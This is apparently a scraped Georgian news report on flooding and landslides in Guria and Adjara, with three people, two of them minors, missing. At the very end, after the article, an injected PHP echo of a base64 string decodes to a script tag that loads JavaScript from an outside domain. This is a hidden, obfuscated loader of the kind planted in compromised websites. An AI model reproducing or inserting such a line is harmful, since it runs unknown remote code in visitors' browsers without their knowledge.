celsiusi
ავერსი შნაიდერი

შინაგან საქმეთა სამინისტროს საგანგებო სიტუაციების მართვის სამსახურის განცხადებით, გურიის და აჭარის რეგიონებში სტიქიის ადგილზე მობილიზებული არიან შინაგან საქმეთა სამინისტროს შესაბამისი დანაყოფების წარმომადგენლები და კომპეტენციის ფარგლებში საჭირო ღონისძიებებს ატარებენ.

მათივე ცნობით, ამ ეტაპზე გურიაში, სხვადასხვა სოფელში სამ პირს ეძებენ.

„შინაგან საქმეთა სამინისტროს საზოგადოებრივი მართვის ცენტრ 112-დან საგანგებო სიტუაციების მართვის სამსახურში 100-ზე მეტი შეტყობინებაა შემოსული გურიის და აჭარის რეგიონებიდან. ძლიერი ნალექის შედეგად დატბორილია საცხოვრებელი სახლები, საველე საბარგულები, მოტეხილია ხეები, ჩამოშლილია მიწის მასები, გარე სამყაროს მოწყვეტილია გურიის რეგიონის რამდენიმე სოფელი.

სტიქიის ადგილზე მობილიზებული არიან შინაგან საქმეთა სამინისტროს შესაბამისი დანაყოფების წარმომადგენლები და კომპეტენციის ფარგლებში ატარებენ საჭირო ღონისძიებებს. ამ ეტაპზე გურიაში, სხვადასხვა სოფელში, სამი პირის, მათ შორის ორი არასრულწლოვანის მიმართ მიმდინარეობს ძებნის ღონისძიება. სრულად მობილიზებულია სახანძრო-სამაშველო ჯგუფები, მიმდინარეობს შესაბამისი სამუშაოები და ყველა შეტყობინებაზე ეტაპობრივად ხორციელდება რეაგირება“, – ნათქვამია განცხადებაში.

461
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");